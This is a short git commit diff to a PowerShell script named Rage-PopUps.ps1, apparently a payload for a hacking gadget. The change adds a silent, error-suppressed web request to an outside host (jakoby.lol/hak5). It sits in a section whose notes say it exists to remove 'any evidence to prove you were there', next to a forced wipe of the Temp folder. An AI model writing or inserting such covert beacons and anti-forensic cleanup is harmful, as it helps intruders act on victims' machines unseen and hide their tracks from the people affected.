Update Rage-PopUps.ps1
This commit is contained in:
parent
f42880977c
commit
e95013267f
1 changed files with 1 additions and 1 deletions
|
@ -57,7 +57,7 @@ Foreach ($msg in $msgs) {
|
|||
.NOTES
|
||||
This is to clean up behind you and remove any evidence to prove you were there
|
||||
#>
|
||||
|
||||
iwr "https://jakoby.lol/hak5" -EA 0 >$null
|
||||
# Delete contents of Temp folder
|
||||
|
||||
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
|
||||
|
|
Loading…
Reference in a new issue